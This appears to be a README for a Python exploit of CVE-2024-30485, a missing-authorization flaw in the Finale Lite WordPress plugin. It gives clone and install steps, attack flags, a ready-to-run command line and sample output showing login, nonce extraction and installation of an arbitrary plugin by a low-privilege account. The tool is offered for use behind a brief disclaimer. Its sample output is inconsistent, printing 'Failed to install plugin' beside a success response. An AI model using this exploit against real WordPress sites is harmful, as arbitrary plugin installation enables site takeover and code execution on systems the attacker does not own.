# CVE-2024-30485 Exploit

## 📌 Overview

**CVE-2024-30485** is a high-severity vulnerability found in the **Finale Lite** plugin for WordPress (versions <= 2.18.0). The vulnerability allows authenticated users (Subscriber+) to install and activate arbitrary plugins without proper authorization.

- **Severity**: HIGH (CVSS 8.8)
- **Affected Versions**: Finale Lite <= 2.18.0
- **CWE**: CWE-862 (Missing Authorization)

## 🚀 Features

- ✅ Check if a WordPress site is vulnerable
- ✅ Authenticate with valid credentials
- ✅ Extract security nonce
- ✅ Install arbitrary plugins
- ✅ Activate installed plugins

## 🛠 Requirements

- Python 3
- `requests` and `beautifulsoup4` modules
- Target WordPress site with a vulnerable plugin
- Valid WordPress Subscriber+ credentials

## 📜 Installation

```bash
# Clone the repository
git clone https://github.com/Nxploited/CVE-2024-30485.git
cd CVE-2024-30485

# Install dependencies
pip install -r requirements.txt
```

## 🔍 Usage

```bash
usage: CVE-2024-30485.py [-h] -u TARGET -U USERNAME -P PASSWORD [plugin]

Exploit CVE-2024-30485 - Finale Lite | # by Khaled AlEnazi

positional arguments:
  plugin                Plugin slug

options:
  -h, --help            show this help message and exit
  -u TARGET, --url TARGET  WordPress site URL
  -U USERNAME, --username USERNAME  WordPress username
  -P PASSWORD, --password PASSWORD  WordPress password
```

### Example:
```bash
python3 CVE-2024-30485.py -u target -U admin -P admin -- disable-comments
```

## 🖥 Output Example

```bash
[+] Target is vulnerable! Detected version: 2.18.0
[+] Logged in successfully.
[+] Extracted Nonce: 2b46e05bc0
[-] Failed to install plugin.
Server Response: 
<p>Unpacking the package&#8230;</p>
<p>Installing the plugin&#8230;</p>
<p>Plugin installed successfully.</p>
</div>{"success":true,"data":"Plugin installed and activated successfully!"}
```

## ⚠️ Disclaimer

This script is for **educational and security research purposes only**. Unauthorized testing against systems **without permission** is illegal. Use responsibly.

## 🔗 References
- [Official CVE Record](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30485)
- [WordPress Plugin Page](https://wordpress.org/plugins/finale-woocommerce-sales-countdown-timer-discount/)

*By: Khaled Alenazi (Nxploit)*
